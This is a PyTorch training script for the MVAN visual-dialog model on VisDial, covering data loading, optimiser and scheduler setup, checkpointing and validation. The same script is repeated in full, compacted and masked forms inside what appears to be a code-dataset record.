batch_loss = self.criterion(output.view(-1, output.size(-1)),
target.view(-1).to(self.device))
return batch_loss
    def train(self):
        """Run the full training loop and return the last checkpoint path.

        Per virtual batch: optimizer step, EMA update of the running loss,
        scheduler step, and periodic TensorBoard logging. Per epoch:
        checkpoint, then validation (intermediate epochs are skipped on
        VisDial v0.9).
        """
        self._build_dataloader()
        self._build_model()
        self._setup_training()
        evaluation = Evaluation(self.hparams, model=self.model, split='val')
        # Forever-increasing counter used for scheduler/TensorBoard steps.
        global_iteration_step = (self.start_epoch - 1) * self.iterations
        running_loss = 0.0
        train_begin = datetime.utcnow()
        print(
            """
# -------------------------------------------------------------------------
# Model Train Starts (NEW)
# -------------------------------------------------------------------------
"""
            )
        # NOTE(review): range(start_epoch, num_epochs) runs num_epochs - 1
        # epochs when start_epoch == 1 -- confirm this off-by-one is intended.
        for epoch in range(self.start_epoch, self.hparams.num_epochs):
            self.model.train()
            combined_dataloader = itertools.chain(self.train_dataloader)
            print(f'\nTraining for epoch {epoch}:', 'Total Iter:', self.
                iterations)
            tqdm_batch_iterator = tqdm(combined_dataloader)
            accumulate_batch = 0
            for i, batch in enumerate(tqdm_batch_iterator):
                # Move every tensor in the batch to the training device.
                buffer_batch = batch.copy()
                for key in batch:
                    buffer_batch[key] = buffer_batch[key].to(self.device)
                output = self.model(buffer_batch)
                batch_loss = self._loss_fn(epoch, batch, output)
                # Gradients accumulate across mini-batches until a full
                # virtual batch has been processed (or the last batch).
                batch_loss.backward()
                accumulate_batch += batch['img_ids'].shape[0]
                if (self.hparams.virtual_batch_size == accumulate_batch or 
                    i == len(self.train_dataset) // self.hparams.
                    train_batch_size):
                    self.optimizer.step()
                    # Exponential moving average of the loss for display.
                    if running_loss > 0.0:
                        running_loss = (0.95 * running_loss + 0.05 *
                            batch_loss.item())
                    else:
                        running_loss = batch_loss.item()
                    self.optimizer.zero_grad()
                    accumulate_batch = 0
                    # Scheduler stepped once per virtual batch with the
                    # global step (legacy epoch-argument form of step()).
                    self.scheduler.step(global_iteration_step)
                    global_iteration_step += 1
                    description = (
                        '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'
                        .format(datetime.utcnow() - train_begin, epoch,
                        global_iteration_step, running_loss, self.optimizer
                        .param_groups[0]['lr']))
                    tqdm_batch_iterator.set_description(description)
                    # Periodic TensorBoard / logger reporting.
                    if (global_iteration_step % self.hparams.
                        tensorboard_step == 0):
                        description = (
                            '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'
                            .format(datetime.utcnow() - train_begin, epoch,
                            global_iteration_step, running_loss, self.
                            optimizer.param_groups[0]['lr']))
                        self._logger.info(description)
                        self.summary_writer.add_scalar('train/loss',
                            batch_loss, global_iteration_step)
                        self.summary_writer.add_scalar('train/lr', self.
                            optimizer.param_groups[0]['lr'],
                            global_iteration_step)
            # On-epoch-end: checkpoint, then (conditionally) validate.
            self.checkpoint_manager.step(epoch)
            self.previous_model_path = os.path.join(self.checkpoint_manager
                .ckpt_dirpath, 'checkpoint_%d.pth' % epoch)
            self._logger.info(self.previous_model_path)
            # On v0.9, only the final epoch is evaluated.
            if (epoch < self.hparams.num_epochs - 1 and self.hparams.
                dataset_version == '0.9'):
                continue
            torch.cuda.empty_cache()
            evaluation.run_evaluate(self.previous_model_path,
                global_iteration_step, self.summary_writer, os.path.join(
                self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %
                epoch))
            torch.cuda.empty_cache()
        return self.previous_model_path
<|reserved_special_token_1|>
import os
# Must be set before torch initializes CUDA so only these GPUs are visible
# to the process.
os.environ["CUDA_VISIBLE_DEVICES"] = "0,1"
# Standard-library / third-party imports.
import logging
import itertools
import torch
from torch import nn, optim
from torch.optim import lr_scheduler
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
from tqdm import tqdm
from setproctitle import setproctitle
from bisect import bisect
from datetime import datetime
import numpy as np
# Project-local modules: dataset, model components, checkpoint utilities,
# and the validation-time evaluation driver.
from data.dataset import VisDialDataset
from visdial.encoders import Encoder
from visdial.decoders import Decoder
from visdial.model import EncoderDecoderModel
from visdial.utils.checkpointing import CheckpointManager, load_checkpoint
from single_evaluation import Evaluation
class MVAN(object):
    """End-to-end training harness for the MVAN visual-dialog model.

    Builds the VisDial dataset/dataloader, the encoder-decoder model with
    its criterion, optimizer and LR scheduler, then runs the training loop
    with gradient accumulation, checkpointing, TensorBoard logging and
    per-epoch validation. Entry point: :meth:`train`.
    """

    def __init__(self, hparams):
        """Store hyperparameters, seed all RNGs, and pick the compute device.

        Args:
            hparams: experiment hyperparameter namespace (random_seed,
                gpu_ids, dataset/model/optimizer settings, ...).
        """
        self.hparams = hparams
        self._logger = logging.getLogger(__name__)
        # Fix every RNG source and force deterministic cuDNN so a run is
        # reproducible for a given hparams.random_seed[0].
        np.random.seed(hparams.random_seed[0])
        torch.manual_seed(hparams.random_seed[0])
        torch.cuda.manual_seed_all(hparams.random_seed[0])
        torch.backends.cudnn.benchmark = False
        torch.backends.cudnn.deterministic = True
        # Convention: gpu_ids[0] < 0 means "run on CPU".
        self.device = (
            torch.device("cuda", self.hparams.gpu_ids[0])
            if self.hparams.gpu_ids[0] >= 0
            else torch.device("cpu")
        )
        # Label the OS process (visible in ps/top) with version/model/seed.
        setproctitle(hparams.dataset_version + '_' + hparams.model_name + '_' + str(hparams.random_seed[0]))

    # def _build_data_process(self):
    def _build_dataloader(self):
        """Create the training dataset and its shuffled DataLoader.

        Sets ``self.train_dataset`` and ``self.train_dataloader``.
        """
        # =============================================================================
        #   SETUP DATASET, DATALOADER
        # =============================================================================
        # VisDial v0.9 uses the old-style split naming; otherwise no override.
        old_split = "train" if self.hparams.dataset_version == "0.9" else None
        self.train_dataset = VisDialDataset(
            self.hparams,
            overfit=self.hparams.overfit,
            split="train",
            old_split = old_split
        )
        # "dan"-style image features need the dataset's custom collation.
        collate_fn = None
        if "dan" in self.hparams.img_feature_type:
            collate_fn = self.train_dataset.collate_fn
        self.train_dataloader = DataLoader(
            self.train_dataset,
            batch_size=self.hparams.train_batch_size,
            num_workers=self.hparams.cpu_workers,
            shuffle=True,
            drop_last=True,
            collate_fn=collate_fn,
        )
        print("""
# -------------------------------------------------------------------------
# DATALOADER FINISHED
# -------------------------------------------------------------------------
""")

    def _build_model(self):
        """Instantiate encoder/decoder, criterion, optimizer and LR scheduler.

        Sets ``self.model``, ``self.criterion``, ``self.iterations``,
        ``self.optimizer`` and ``self.scheduler``.

        Raises:
            NotImplementedError: if ``hparams.lr_scheduler`` is not "LambdaLR".
        """
        # =============================================================================
        #   MODEL : Encoder, Decoder
        # =============================================================================
        print('\t* Building model...')
        # Pass vocabulary to construct Embedding layer.
        encoder = Encoder(self.hparams, self.train_dataset.vocabulary)
        decoder = Decoder(self.hparams, self.train_dataset.vocabulary)
        print("Encoder: {}".format(self.hparams.encoder))
        print("Decoder: {}".format(self.hparams.decoder))
        # New: Initializing word_embed using GloVe
        if self.hparams.glove_npy != '':
            encoder.word_embed.weight.data = torch.from_numpy(np.load(self.hparams.glove_npy))
            print("Loaded glove vectors from {}".format(self.hparams.glove_npy))
        # Share word embedding between encoder and decoder.
        decoder.word_embed = encoder.word_embed
        # Wrap encoder and decoder in a model.
        self.model = EncoderDecoderModel(encoder, decoder)
        self.model = self.model.to(self.device)
        # Use Multi-GPUs
        if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:
            self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)
        # =============================================================================
        #   CRITERION
        # =============================================================================
        # Discriminative decoder: plain cross-entropy over answer options.
        # Generative decoder: token-level cross-entropy that ignores padding.
        if "disc" in self.hparams.decoder:
            self.criterion = nn.CrossEntropyLoss()
        elif "gen" in self.hparams.decoder:
            self.criterion = nn.CrossEntropyLoss(ignore_index=self.train_dataset.vocabulary.PAD_INDEX)
        # Total Iterations -> for learning rate scheduler
        # NOTE(review): self.valid_dataset is never assigned in this class, so
        # training_splits == "trainval" would raise AttributeError -- confirm
        # it is set elsewhere before relying on that path.
        if self.hparams.training_splits == "trainval":
            self.iterations = (len(self.train_dataset) + len(self.valid_dataset)) // self.hparams.virtual_batch_size
        else:
            self.iterations = len(self.train_dataset) // self.hparams.virtual_batch_size
        # =============================================================================
        #   OPTIMIZER, SCHEDULER
        # =============================================================================

        def lr_lambda_fun(current_iteration: int) -> float:
            """Returns a learning rate multiplier.

            Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,
            and then gets multiplied by `lr_gamma` every time a milestone is crossed.
            """
            # Fractional epoch reached after `current_iteration` scheduler steps.
            current_epoch = float(current_iteration) / self.iterations
            if current_epoch <= self.hparams.warmup_epochs:
                alpha = current_epoch / float(self.hparams.warmup_epochs)
                return self.hparams.warmup_factor * (1.0 - alpha) + alpha
            else:
                return_val = 1.0
                # First milestone list decays by lr_gamma per crossed milestone;
                # once lr_milestones2 starts, lr_gamma2 takes over (scaled by
                # one factor of lr_gamma).
                if current_epoch >= self.hparams.lr_milestones[0] and current_epoch < self.hparams.lr_milestones2[0]:
                    idx = bisect(self.hparams.lr_milestones, current_epoch)
                    return_val = pow(self.hparams.lr_gamma, idx)
                elif current_epoch >= self.hparams.lr_milestones2[0]:
                    idx = bisect(self.hparams.lr_milestones2, current_epoch)
                    return_val = self.hparams.lr_gamma * pow(self.hparams.lr_gamma2, idx)
                return return_val

        if self.hparams.lr_scheduler == "LambdaLR":
            self.optimizer = optim.Adam(self.model.parameters(), lr=self.hparams.initial_lr)
            self.scheduler = lr_scheduler.LambdaLR(self.optimizer, lr_lambda=lr_lambda_fun)
        else:
            raise NotImplementedError
        print(
            """
# -------------------------------------------------------------------------
# Model Build Finished
# -------------------------------------------------------------------------
"""
        )

    def _setup_training(self):
        """Prepare save dir, TensorBoard writer, checkpointing, and resume state.

        If ``hparams.load_pthpath`` is non-empty, restores model/optimizer
        weights from that checkpoint and resumes from the following epoch;
        otherwise training starts at epoch 1.
        """
        # Default relative save path is anchored at the project root dir.
        if self.hparams.save_dirpath == 'checkpoints/':
            self.save_dirpath = os.path.join(self.hparams.root_dir, self.hparams.save_dirpath)
        self.summary_writer = SummaryWriter(self.save_dirpath)
        self.checkpoint_manager = CheckpointManager(
            self.model, self.optimizer, self.save_dirpath, hparams=self.hparams
        )
        # If loading from checkpoint, adjust start epoch and load parameters.
        if self.hparams.load_pthpath == "":
            self.start_epoch = 1
        else:
            # "path/to/checkpoint_xx.pth" -> xx
            self.start_epoch = int(self.hparams.load_pthpath.split("_")[-1][:-4])
            self.start_epoch += 1
            model_state_dict, optimizer_state_dict = load_checkpoint(self.hparams.load_pthpath)
            # DataParallel wraps the real model in `.module`; load into it.
            if isinstance(self.model, nn.DataParallel):
                self.model.module.load_state_dict(model_state_dict)
            else:
                self.model.load_state_dict(model_state_dict)
            self.optimizer.load_state_dict(optimizer_state_dict)
            self.previous_model_path = self.hparams.load_pthpath
            print("Loaded model from {}".format(self.hparams.load_pthpath))
        print(
            """
# -------------------------------------------------------------------------
# Setup Training Finished
# -------------------------------------------------------------------------
"""
        )

    def _loss_fn(self, epoch, batch, output):
        """Cross-entropy loss for one batch; ``epoch`` is currently unused.

        Discriminative decoders are scored against the ground-truth option
        index ('ans_ind'); generative decoders against the answer tokens
        ('ans_out').
        """
        target = (batch["ans_ind"] if "disc" in self.hparams.decoder else batch["ans_out"])
        batch_loss = self.criterion(output.view(-1, output.size(-1)), target.view(-1).to(self.device))
        return batch_loss

    def train(self):
        """Run the full training loop and return the last checkpoint path.

        Per virtual batch: optimizer step, EMA update of the running loss,
        scheduler step, and periodic TensorBoard logging. Per epoch:
        checkpoint, then validation (intermediate epochs are skipped on
        VisDial v0.9).
        """
        self._build_dataloader()
        self._build_model()
        self._setup_training()
        # Evaluation Setup
        evaluation = Evaluation(self.hparams, model=self.model, split="val")
        # Forever increasing counter to keep track of iterations (for tensorboard log).
        global_iteration_step = (self.start_epoch - 1) * self.iterations
        running_loss = 0.0  # New
        train_begin = datetime.utcnow()  # New
        print(
            """
# -------------------------------------------------------------------------
# Model Train Starts (NEW)
# -------------------------------------------------------------------------
"""
        )
        # NOTE(review): range(start_epoch, num_epochs) runs num_epochs - 1
        # epochs when start_epoch == 1 -- confirm this off-by-one is intended.
        for epoch in range(self.start_epoch, self.hparams.num_epochs):
            self.model.train()
            # -------------------------------------------------------------------------
            #   ON EPOCH START  (combine dataloaders if training on train + val)
            # -------------------------------------------------------------------------
            combined_dataloader = itertools.chain(self.train_dataloader)
            print(f"\nTraining for epoch {epoch}:", "Total Iter:", self.iterations)
            tqdm_batch_iterator = tqdm(combined_dataloader)
            accumulate_batch = 0 # taesun New
            for i, batch in enumerate(tqdm_batch_iterator):
                # Move every tensor in the batch to the training device.
                buffer_batch = batch.copy()
                for key in batch:
                    buffer_batch[key] = buffer_batch[key].to(self.device)
                output = self.model(buffer_batch)
                batch_loss = self._loss_fn(epoch, batch, output)
                # Gradients accumulate across mini-batches until a full
                # virtual batch has been processed (or the last batch).
                batch_loss.backward()
                accumulate_batch += batch["img_ids"].shape[0]
                if self.hparams.virtual_batch_size == accumulate_batch \
                    or i == (len(self.train_dataset) // self.hparams.train_batch_size): # last batch
                    self.optimizer.step()
                    # --------------------------------------------------------------------
                    # Update running loss and decay learning rates
                    # --------------------------------------------------------------------
                    # Exponential moving average of the loss for display.
                    if running_loss > 0.0:
                        running_loss = 0.95 * running_loss + 0.05 * batch_loss.item()
                    else:
                        running_loss = batch_loss.item()
                    self.optimizer.zero_grad()
                    accumulate_batch = 0
                    # Scheduler stepped once per virtual batch with the
                    # global step (legacy epoch-argument form of step()).
                    self.scheduler.step(global_iteration_step)
                    global_iteration_step += 1
                    # torch.cuda.empty_cache()
                    description = "[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]".format(
                        datetime.utcnow() - train_begin,
                        epoch,
                        global_iteration_step, running_loss,
                        self.optimizer.param_groups[0]['lr'])
                    tqdm_batch_iterator.set_description(description)
                    # tensorboard
                    if global_iteration_step % self.hparams.tensorboard_step == 0:
                        description = "[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]".format(
                            datetime.utcnow() - train_begin,
                            epoch,
                            global_iteration_step, running_loss,
                            self.optimizer.param_groups[0]['lr'],
                        )
                        self._logger.info(description)
                        # tensorboard writing scalar
                        self.summary_writer.add_scalar(
                            "train/loss", batch_loss, global_iteration_step
                        )
                        self.summary_writer.add_scalar(
                            "train/lr", self.optimizer.param_groups[0]["lr"], global_iteration_step
                        )
            # -------------------------------------------------------------------------
            #   ON EPOCH END  (checkpointing and validation)
            # -------------------------------------------------------------------------
            self.checkpoint_manager.step(epoch)
            self.previous_model_path = os.path.join(self.checkpoint_manager.ckpt_dirpath, "checkpoint_%d.pth" % (epoch))
            self._logger.info(self.previous_model_path)
            # On v0.9, only the final epoch is evaluated.
            if epoch < self.hparams.num_epochs - 1 and self.hparams.dataset_version == '0.9':
                continue
            torch.cuda.empty_cache()
            evaluation.run_evaluate(self.previous_model_path, global_iteration_step, self.summary_writer,
                                    os.path.join(self.checkpoint_manager.ckpt_dirpath, "ranks_%d_valid.json" % epoch))
            torch.cuda.empty_cache()
        return self.previous_model_path
|
flexible
|
{
"blob_id": "4d1900c1a0a8d7639e0ec16fb0128fd8efc2e8a1",
"index": 9913,
"step-1": "<mask token>\n\n\nclass MVAN(object):\n <mask token>\n <mask token>\n <mask token>\n\n def _setup_training(self):\n if self.hparams.save_dirpath == 'checkpoints/':\n self.save_dirpath = os.path.join(self.hparams.root_dir, self.\n hparams.save_dirpath)\n self.summary_writer = SummaryWriter(self.save_dirpath)\n self.checkpoint_manager = CheckpointManager(self.model, self.\n optimizer, self.save_dirpath, hparams=self.hparams)\n if self.hparams.load_pthpath == '':\n self.start_epoch = 1\n else:\n self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]\n [:-4])\n self.start_epoch += 1\n model_state_dict, optimizer_state_dict = load_checkpoint(self.\n hparams.load_pthpath)\n if isinstance(self.model, nn.DataParallel):\n self.model.module.load_state_dict(model_state_dict)\n else:\n self.model.load_state_dict(model_state_dict)\n self.optimizer.load_state_dict(optimizer_state_dict)\n self.previous_model_path = self.hparams.load_pthpath\n print('Loaded model from {}'.format(self.hparams.load_pthpath))\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Setup Training Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _loss_fn(self, epoch, batch, output):\n target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[\n 'ans_out']\n batch_loss = self.criterion(output.view(-1, output.size(-1)),\n target.view(-1).to(self.device))\n return batch_loss\n\n def train(self):\n self._build_dataloader()\n self._build_model()\n self._setup_training()\n evaluation = Evaluation(self.hparams, model=self.model, split='val')\n global_iteration_step = (self.start_epoch - 1) * self.iterations\n running_loss = 0.0\n train_begin = datetime.utcnow()\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Train Starts (NEW)\n # -------------------------------------------------------------------------\n \"\"\"\n )\n 
for epoch in range(self.start_epoch, self.hparams.num_epochs):\n self.model.train()\n combined_dataloader = itertools.chain(self.train_dataloader)\n print(f'\\nTraining for epoch {epoch}:', 'Total Iter:', self.\n iterations)\n tqdm_batch_iterator = tqdm(combined_dataloader)\n accumulate_batch = 0\n for i, batch in enumerate(tqdm_batch_iterator):\n buffer_batch = batch.copy()\n for key in batch:\n buffer_batch[key] = buffer_batch[key].to(self.device)\n output = self.model(buffer_batch)\n batch_loss = self._loss_fn(epoch, batch, output)\n batch_loss.backward()\n accumulate_batch += batch['img_ids'].shape[0]\n if (self.hparams.virtual_batch_size == accumulate_batch or \n i == len(self.train_dataset) // self.hparams.\n train_batch_size):\n self.optimizer.step()\n if running_loss > 0.0:\n running_loss = (0.95 * running_loss + 0.05 *\n batch_loss.item())\n else:\n running_loss = batch_loss.item()\n self.optimizer.zero_grad()\n accumulate_batch = 0\n self.scheduler.step(global_iteration_step)\n global_iteration_step += 1\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.optimizer\n .param_groups[0]['lr']))\n tqdm_batch_iterator.set_description(description)\n if (global_iteration_step % self.hparams.\n tensorboard_step == 0):\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.\n optimizer.param_groups[0]['lr']))\n self._logger.info(description)\n self.summary_writer.add_scalar('train/loss',\n batch_loss, global_iteration_step)\n self.summary_writer.add_scalar('train/lr', self.\n optimizer.param_groups[0]['lr'],\n global_iteration_step)\n self.checkpoint_manager.step(epoch)\n self.previous_model_path = os.path.join(self.checkpoint_manager\n .ckpt_dirpath, 'checkpoint_%d.pth' % epoch)\n self._logger.info(self.previous_model_path)\n if 
(epoch < self.hparams.num_epochs - 1 and self.hparams.\n dataset_version == '0.9'):\n continue\n torch.cuda.empty_cache()\n evaluation.run_evaluate(self.previous_model_path,\n global_iteration_step, self.summary_writer, os.path.join(\n self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %\n epoch))\n torch.cuda.empty_cache()\n return self.previous_model_path\n",
"step-2": "<mask token>\n\n\nclass MVAN(object):\n <mask token>\n\n def _build_dataloader(self):\n old_split = 'train' if self.hparams.dataset_version == '0.9' else None\n self.train_dataset = VisDialDataset(self.hparams, overfit=self.\n hparams.overfit, split='train', old_split=old_split)\n collate_fn = None\n if 'dan' in self.hparams.img_feature_type:\n collate_fn = self.train_dataset.collate_fn\n self.train_dataloader = DataLoader(self.train_dataset, batch_size=\n self.hparams.train_batch_size, num_workers=self.hparams.\n cpu_workers, shuffle=True, drop_last=True, collate_fn=collate_fn)\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # DATALOADER FINISHED\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _build_model(self):\n print('\\t* Building model...')\n encoder = Encoder(self.hparams, self.train_dataset.vocabulary)\n decoder = Decoder(self.hparams, self.train_dataset.vocabulary)\n print('Encoder: {}'.format(self.hparams.encoder))\n print('Decoder: {}'.format(self.hparams.decoder))\n if self.hparams.glove_npy != '':\n encoder.word_embed.weight.data = torch.from_numpy(np.load(self.\n hparams.glove_npy))\n print('Loaded glove vectors from {}'.format(self.hparams.glove_npy)\n )\n decoder.word_embed = encoder.word_embed\n self.model = EncoderDecoderModel(encoder, decoder)\n self.model = self.model.to(self.device)\n if -1 not in self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:\n self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)\n if 'disc' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss()\n elif 'gen' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss(ignore_index=self.\n train_dataset.vocabulary.PAD_INDEX)\n if self.hparams.training_splits == 'trainval':\n self.iterations = (len(self.train_dataset) + len(self.\n valid_dataset)) // self.hparams.virtual_batch_size\n else:\n self.iterations = len(self.train_dataset\n ) 
// self.hparams.virtual_batch_size\n\n def lr_lambda_fun(current_iteration: int) ->float:\n \"\"\"Returns a learning rate multiplier.\n\n Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,\n and then gets multiplied by `lr_gamma` every time a milestone is crossed.\n \"\"\"\n current_epoch = float(current_iteration) / self.iterations\n if current_epoch <= self.hparams.warmup_epochs:\n alpha = current_epoch / float(self.hparams.warmup_epochs)\n return self.hparams.warmup_factor * (1.0 - alpha) + alpha\n else:\n return_val = 1.0\n if current_epoch >= self.hparams.lr_milestones[0\n ] and current_epoch < self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones, current_epoch)\n return_val = pow(self.hparams.lr_gamma, idx)\n elif current_epoch >= self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones2, current_epoch)\n return_val = self.hparams.lr_gamma * pow(self.hparams.\n lr_gamma2, idx)\n return return_val\n if self.hparams.lr_scheduler == 'LambdaLR':\n self.optimizer = optim.Adam(self.model.parameters(), lr=self.\n hparams.initial_lr)\n self.scheduler = lr_scheduler.LambdaLR(self.optimizer,\n lr_lambda=lr_lambda_fun)\n else:\n raise NotImplementedError\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Build Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _setup_training(self):\n if self.hparams.save_dirpath == 'checkpoints/':\n self.save_dirpath = os.path.join(self.hparams.root_dir, self.\n hparams.save_dirpath)\n self.summary_writer = SummaryWriter(self.save_dirpath)\n self.checkpoint_manager = CheckpointManager(self.model, self.\n optimizer, self.save_dirpath, hparams=self.hparams)\n if self.hparams.load_pthpath == '':\n self.start_epoch = 1\n else:\n self.start_epoch = int(self.hparams.load_pthpath.split('_')[-1]\n [:-4])\n self.start_epoch += 1\n model_state_dict, optimizer_state_dict = 
load_checkpoint(self.\n hparams.load_pthpath)\n if isinstance(self.model, nn.DataParallel):\n self.model.module.load_state_dict(model_state_dict)\n else:\n self.model.load_state_dict(model_state_dict)\n self.optimizer.load_state_dict(optimizer_state_dict)\n self.previous_model_path = self.hparams.load_pthpath\n print('Loaded model from {}'.format(self.hparams.load_pthpath))\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Setup Training Finished\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _loss_fn(self, epoch, batch, output):\n target = batch['ans_ind'] if 'disc' in self.hparams.decoder else batch[\n 'ans_out']\n batch_loss = self.criterion(output.view(-1, output.size(-1)),\n target.view(-1).to(self.device))\n return batch_loss\n\n def train(self):\n self._build_dataloader()\n self._build_model()\n self._setup_training()\n evaluation = Evaluation(self.hparams, model=self.model, split='val')\n global_iteration_step = (self.start_epoch - 1) * self.iterations\n running_loss = 0.0\n train_begin = datetime.utcnow()\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # Model Train Starts (NEW)\n # -------------------------------------------------------------------------\n \"\"\"\n )\n for epoch in range(self.start_epoch, self.hparams.num_epochs):\n self.model.train()\n combined_dataloader = itertools.chain(self.train_dataloader)\n print(f'\\nTraining for epoch {epoch}:', 'Total Iter:', self.\n iterations)\n tqdm_batch_iterator = tqdm(combined_dataloader)\n accumulate_batch = 0\n for i, batch in enumerate(tqdm_batch_iterator):\n buffer_batch = batch.copy()\n for key in batch:\n buffer_batch[key] = buffer_batch[key].to(self.device)\n output = self.model(buffer_batch)\n batch_loss = self._loss_fn(epoch, batch, output)\n batch_loss.backward()\n accumulate_batch += batch['img_ids'].shape[0]\n if 
(self.hparams.virtual_batch_size == accumulate_batch or \n i == len(self.train_dataset) // self.hparams.\n train_batch_size):\n self.optimizer.step()\n if running_loss > 0.0:\n running_loss = (0.95 * running_loss + 0.05 *\n batch_loss.item())\n else:\n running_loss = batch_loss.item()\n self.optimizer.zero_grad()\n accumulate_batch = 0\n self.scheduler.step(global_iteration_step)\n global_iteration_step += 1\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.optimizer\n .param_groups[0]['lr']))\n tqdm_batch_iterator.set_description(description)\n if (global_iteration_step % self.hparams.\n tensorboard_step == 0):\n description = (\n '[{}][Epoch: {:3d}][Iter: {:6d}][Loss: {:6f}][lr: {:7f}]'\n .format(datetime.utcnow() - train_begin, epoch,\n global_iteration_step, running_loss, self.\n optimizer.param_groups[0]['lr']))\n self._logger.info(description)\n self.summary_writer.add_scalar('train/loss',\n batch_loss, global_iteration_step)\n self.summary_writer.add_scalar('train/lr', self.\n optimizer.param_groups[0]['lr'],\n global_iteration_step)\n self.checkpoint_manager.step(epoch)\n self.previous_model_path = os.path.join(self.checkpoint_manager\n .ckpt_dirpath, 'checkpoint_%d.pth' % epoch)\n self._logger.info(self.previous_model_path)\n if (epoch < self.hparams.num_epochs - 1 and self.hparams.\n dataset_version == '0.9'):\n continue\n torch.cuda.empty_cache()\n evaluation.run_evaluate(self.previous_model_path,\n global_iteration_step, self.summary_writer, os.path.join(\n self.checkpoint_manager.ckpt_dirpath, 'ranks_%d_valid.json' %\n epoch))\n torch.cuda.empty_cache()\n return self.previous_model_path\n",
"step-3": "<mask token>\n\n\nclass MVAN(object):\n\n def __init__(self, hparams):\n self.hparams = hparams\n self._logger = logging.getLogger(__name__)\n np.random.seed(hparams.random_seed[0])\n torch.manual_seed(hparams.random_seed[0])\n torch.cuda.manual_seed_all(hparams.random_seed[0])\n torch.backends.cudnn.benchmark = False\n torch.backends.cudnn.deterministic = True\n self.device = torch.device('cuda', self.hparams.gpu_ids[0]\n ) if self.hparams.gpu_ids[0] >= 0 else torch.device('cpu')\n setproctitle(hparams.dataset_version + '_' + hparams.model_name +\n '_' + str(hparams.random_seed[0]))\n\n def _build_dataloader(self):\n old_split = 'train' if self.hparams.dataset_version == '0.9' else None\n self.train_dataset = VisDialDataset(self.hparams, overfit=self.\n hparams.overfit, split='train', old_split=old_split)\n collate_fn = None\n if 'dan' in self.hparams.img_feature_type:\n collate_fn = self.train_dataset.collate_fn\n self.train_dataloader = DataLoader(self.train_dataset, batch_size=\n self.hparams.train_batch_size, num_workers=self.hparams.\n cpu_workers, shuffle=True, drop_last=True, collate_fn=collate_fn)\n print(\n \"\"\"\n # -------------------------------------------------------------------------\n # DATALOADER FINISHED\n # -------------------------------------------------------------------------\n \"\"\"\n )\n\n def _build_model(self):\n print('\\t* Building model...')\n encoder = Encoder(self.hparams, self.train_dataset.vocabulary)\n decoder = Decoder(self.hparams, self.train_dataset.vocabulary)\n print('Encoder: {}'.format(self.hparams.encoder))\n print('Decoder: {}'.format(self.hparams.decoder))\n if self.hparams.glove_npy != '':\n encoder.word_embed.weight.data = torch.from_numpy(np.load(self.\n hparams.glove_npy))\n print('Loaded glove vectors from {}'.format(self.hparams.glove_npy)\n )\n decoder.word_embed = encoder.word_embed\n self.model = EncoderDecoderModel(encoder, decoder)\n self.model = self.model.to(self.device)\n if -1 not in 
self.hparams.gpu_ids and len(self.hparams.gpu_ids) > 1:\n self.model = nn.DataParallel(self.model, self.hparams.gpu_ids)\n if 'disc' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss()\n elif 'gen' in self.hparams.decoder:\n self.criterion = nn.CrossEntropyLoss(ignore_index=self.\n train_dataset.vocabulary.PAD_INDEX)\n if self.hparams.training_splits == 'trainval':\n self.iterations = (len(self.train_dataset) + len(self.\n valid_dataset)) // self.hparams.virtual_batch_size\n else:\n self.iterations = len(self.train_dataset\n ) // self.hparams.virtual_batch_size\n\n def lr_lambda_fun(current_iteration: int) ->float:\n \"\"\"Returns a learning rate multiplier.\n\n Till `warmup_epochs`, learning rate linearly increases to `initial_lr`,\n and then gets multiplied by `lr_gamma` every time a milestone is crossed.\n \"\"\"\n current_epoch = float(current_iteration) / self.iterations\n if current_epoch <= self.hparams.warmup_epochs:\n alpha = current_epoch / float(self.hparams.warmup_epochs)\n return self.hparams.warmup_factor * (1.0 - alpha) + alpha\n else:\n return_val = 1.0\n if current_epoch >= self.hparams.lr_milestones[0\n ] and current_epoch < self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones, current_epoch)\n return_val = pow(self.hparams.lr_gamma, idx)\n elif current_epoch >= self.hparams.lr_milestones2[0]:\n idx = bisect(self.hparams.lr_milestones2, current_epoch)\n return_val = self.hparams.lr_gamma * pow(self.hparams.\n lr_gamma2, idx)\n return return_val\n if self.hparams.lr_scheduler == 'LambdaLR':\n self.optimizer = optim.Adam(self.model.parameters(), 